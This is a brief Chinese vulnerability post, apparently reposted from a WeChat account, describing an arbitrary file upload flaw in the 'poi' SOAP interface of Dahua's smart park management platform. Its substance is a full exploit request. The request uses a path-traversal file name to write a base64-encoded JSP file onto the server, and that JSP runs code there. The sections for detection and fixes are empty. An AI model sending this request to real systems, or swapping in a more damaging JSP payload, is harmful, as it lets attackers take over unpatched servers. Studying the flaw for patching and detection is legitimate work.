漏洞描述
s/soap/poi接口存在文件上传漏洞,攻击者利用该漏洞可以获取服务器权限。
漏洞请求包
POST
/emap/webservice/gis/soap/poi
HTTP/1.1
Host: 127.0.0.1
Content-Type
: text/xml;charset=UTF-8
User-Agent
: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
<
soapenv:Envelope
xmlns:soapenv
=
"http://schemas.xmlsoap.org/soap/envelope/"
xmlns:res
=
"http://response.webservice.poi.mapbiz.emap.dahuatech.com/"
>
<
soapenv:Header
/>
<
soapenv:Body
>
<
res:uploadPicFile
>
<!--type: string-->
<
arg0
>
/../../test.jsp
</
arg0
>
<!--type: base64Binary-->
<
arg1
>
PCUgb3V0LnByaW50bG4oIlFheDM2b25iIik7bmV3IGphdmEuaW8uRmlsZShhcHBsaWNhdGlvbi5nZXRSZWFsUGF0aChyZXF1ZXN0LmdldFNlcnZsZXRQYXRoKCkpKS5kZWxldGUoKTsgJT4=
</
arg1
>
</
res:uploadPicFile
>
</
soapenv:Body
>
</
soapenv:Envelope
>
漏洞检测与利用
修复建议
原文始发于微信公众号(南街老友):大华智慧园区综合管理平台poi任意文件上传漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论